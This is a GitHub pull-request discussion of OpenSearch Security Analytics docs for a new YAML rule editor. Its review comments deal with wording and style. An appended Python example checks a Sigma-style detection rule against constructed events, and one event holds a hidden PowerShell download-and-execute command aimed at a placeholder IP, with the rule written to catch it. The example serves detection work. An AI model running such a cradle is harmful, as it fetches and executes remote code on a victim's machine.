Add new Rules documentation that covers YAML Editor view #2407
Conversation
Signed-off-by: cwillum <cwmmoore@amazon.com>
Waiting a while longer for Doc Review to see if I can get a Tech Review first today.
_security-analytics/usage/rules.md
@@ -17,7 +17,27 @@ When you open the Rules page, all rules are listed in the table. Use the search | |||
Alternatively, you can use the **Rule type**, **Rule severity**, and **Source** dropdown menus to drill down in the list of alerts and filter for preferred results. You can use all three menus in combination to narrow results. Select only one option per menu. |
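Review bot: "drill down in the list of alerts" names the wrong object for this hunk; the table being filtered is the rules table (the hunk header's own context reads "all rules are listed in the table"), so it should say "drill down in the list of rules". The closing sentence "Select only one option per menu." also states a restriction that should be checked against what the three dropdown menus actually permit before it ships; if multiple selections are allowed, replace it with "You can select more than one option in each menu."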
> Select only one option per menu.

I must have missed this during my initial read of the documentation. The filter menus for this table support selecting multiple options (e.g., the table can be filtered to display only Critical and Low severity rules).
Operator error. Yes, pick as many as you'd like. Thanks. Reworded this statement.
_security-analytics/usage/rules.md
If you choose to create the rule manually, you can refer to Sigma's [Rule Creation Guide](https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide) to help understand details for each field. | ||
* By default, the Visual Editor is displayed. Enter the appropriate content in each field and select **Create** in the lower-right corner of the window to save the rule. | ||
* the Create a rule window also provides the YAML Editor so that you can create the rule directly in a YAML file format. Select **YAML Editor** and then enter information for the pre-populated field types. |
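Review bot: the second bullet starts its sentence with a lowercase "the", and "enter information for the pre-populated field types" leaves the reader without the one fact they need, namely which format those pre-populated keys follow. Since the paragraph above links Sigma's Rule Creation Guide as the reference for each field, say explicitly that the YAML Editor's fields follow the Sigma rule format (if that is what the linked guide applies to) so the cross-reference is actionable, e.g. "Select **YAML Editor** and complete the pre-populated Sigma rule fields."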
Small typo: Should this bullet point start with a capital T?
Yup. Thank you.
Signed-off-by: cwillum <cwmmoore@amazon.com>
LGTM.
Looks good to me. I forwarded this PR to the rest of the security analytics team in case they have any feedback.
Minimal comments; LGTM
_security-analytics/usage/rules.md
* By default, the Visual Editor is displayed. Enter the appropriate content in each field and select **Create** in the lower-right corner of the window to save the rule. | ||
* The Create a rule window also provides the YAML Editor so that you can create the rule directly in a YAML file format. Select **YAML Editor** and then enter information for the pre-populated field types. | ||
The alternatives to manually creating a rule, however, make the process easier and faster. They involve either importing a rule in a YAML file or duplicating an existing rule and customizing it. See the next two sections for detailed steps. |
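Review bot: "See the next two sections for detailed steps." is a positional cross-reference that silently breaks if the page is reorganized; name the two alternatives the sentence itself already lists, e.g. "See Importing rules and Duplicating rules for detailed steps." The comparative "easier and faster" in the same sentence is a style-guide issue as well; "simplify and speed up the process" keeps the meaning without it.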
Per the style guide, we should avoid terms like "easier". Suggestion: "..., however, simplify and speed up the process."
I like it.
_security-analytics/usage/rules.md
<br><img src="{{site.url}}{{site.baseurl}}/images/Security/rule-dup2.png" alt="Opening the rule details pane" width="500"> | ||
1. Select the **Duplicate** button in the upper-right corner of the pane. The Duplicate rule window opens in Visual Editor view and all of the fields are automatically populated with the rule's details. Details are also populated in YAML Editor view. | ||
<br><img src="{{site.url}}{{site.baseurl}}/images/Security/dupe-rule.png" alt="Selecting the duplicate button opens the Duplicate rule window" width="500"> | ||
1. In either Visual Editor view or YAML Editor view, modify any of the fields to customize the rule. | ||
1. After performing any modifications to the rule, select the **Create** button in the lower-right corner of the window. A new and customized rule is created, and it appears in the list of rules on the main page of the Rules window. |
Replace double space between "A" and "new" with single space.
Good catch
Signed-off-by: cwillum <cwmmoore@amazon.com>
* fix#2400-yaml-editor-rules
  Signed-off-by: cwillum <cwmmoore@amazon.com>
* fix#2400-yaml-editor-rules
  Signed-off-by: cwillum <cwmmoore@amazon.com>
* fix#2400-yaml-editor-rules
  Signed-off-by: cwillum <cwmmoore@amazon.com>

Signed-off-by: cwillum <cwmmoore@amazon.com>
…)" This reverts commit 39fa3b9.
Signed-off-by: cwillum <cwmmoore@amazon.com>
Description
A new YAML Editor view has been added for 2.5 on the Rules page for Security Analytics.
Issues Resolved
Added new content and added or updated screenshots to include the new feature.
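The documentation changed by this PR describes entering a rule in the YAML Editor with pre-populated fields and points readers to Sigma's Rule Creation Guide for what each field means. As an added example that is not part of this PR, the OpenSearch Security Analytics plugin, or SigmaHQ, the script below takes a constructed rule in the parsed form of that YAML (Sigma field names: `title`, `logsource`, `detection`, `level`, and so on), checks the fields a rule needs before it can be saved, and evaluates the `detection` block against three constructed process-creation events. The `selection`/`filter`/`condition` evaluator is a deliberately small subset of Sigma written for this example (no parentheses, no wildcards, no aggregation) and is not the plugin's own rule engine; the `sccm-agent.exe` allow-list entry and the events are invented for illustration.

```python
"""Added example: a small Sigma-style rule checker, not OpenSearch or SigmaHQ code.
It validates the fields a rule written in the YAML Editor carries and evaluates
the detection block against constructed process-creation events."""

SEVERITIES = ("informational", "low", "medium", "high", "critical")
REQUIRED = ("title", "logsource", "detection")

# Constructed rule, shown here as the parsed form of the YAML a user would
# paste into the YAML Editor. Field names follow the Sigma rule format; the
# 'filter' allow-list entry is a hypothetical internal tool, not a real product.
RULE = {
    "title": "Suspicious PowerShell Download Cradle",
    "status": "experimental",
    "description": "PowerShell fetching a script over HTTP from its command line.",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["DownloadString", "Invoke-WebRequest"],
        },
        "filter": {"ParentImage|endswith": "\\sccm-agent.exe"},
        "condition": "selection and not filter",
    },
    "falsepositives": ["Administrative scripts that fetch updates"],
    "level": "high",
}

# Constructed events (not real telemetry): a download cradle, the same cradle
# launched by the allow-listed parent, and an unrelated cmd.exe process.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/a.ps1')",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell Invoke-WebRequest http://198.51.100.7/update.ps1",
     "ParentImage": "C:\\Program Files\\sccm-agent.exe"},
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c dir",
     "ParentImage": "C:\\Windows\\explorer.exe"},
]


def validate_rule(rule):
    """Return a list of problems; an empty list means the rule can be saved."""
    problems = [f"missing required field: {k}" for k in REQUIRED if k not in rule]
    if "condition" not in rule.get("detection", {}):
        problems.append("detection has no condition")
    level = rule.get("level")
    if level is not None and level not in SEVERITIES:
        problems.append(f"unknown level: {level}")
    return problems


def _match_field(event, key, expected):
    """Apply one 'Field|modifier: value(s)' pair; list values are OR-ed."""
    field, _, modifier = key.partition("|")
    value = str(event.get(field, "")).lower()
    for want in expected if isinstance(expected, list) else [expected]:
        want = str(want).lower()
        if (modifier == "contains" and want in value
                or modifier == "endswith" and value.endswith(want)
                or modifier == "startswith" and value.startswith(want)
                or modifier == "" and value == want):
            return True
    return False


def evaluate(rule, event):
    """Evaluate the condition: identifiers joined by 'and'/'or', optional 'not'.
    'and' binds tighter than 'or'; parentheses and wildcards are not supported."""
    det = rule["detection"]
    hits = {name: all(_match_field(event, k, v) for k, v in sel.items())
            for name, sel in det.items() if name != "condition"}
    or_value, and_value, negate = False, True, False
    for tok in det["condition"].split():
        if tok == "or":
            or_value, and_value = or_value or and_value, True
        elif tok == "not":
            negate = True
        elif tok != "and":
            if tok not in hits:
                raise ValueError(f"condition references unknown selection: {tok}")
            and_value = and_value and (hits[tok] != negate)
            negate = False
    return or_value or and_value


def matching_events(rule, events):
    """Indexes of the events the rule fires on."""
    return [i for i, e in enumerate(events) if evaluate(rule, e)]


if __name__ == "__main__":
    print("problems:", validate_rule(RULE))
    print("matches:", matching_events(RULE, EVENTS))
```

Running the script reports no validation problems and a match on the first event only: the second event matches `selection` but is suppressed by the `filter` allow-list, and the third never satisfies `selection`. Changing `level` to a value outside the Sigma severity set, or deleting `condition`, makes `validate_rule` report it, which is the kind of check a practitioner wants before pasting a hand-written rule into the YAML Editor.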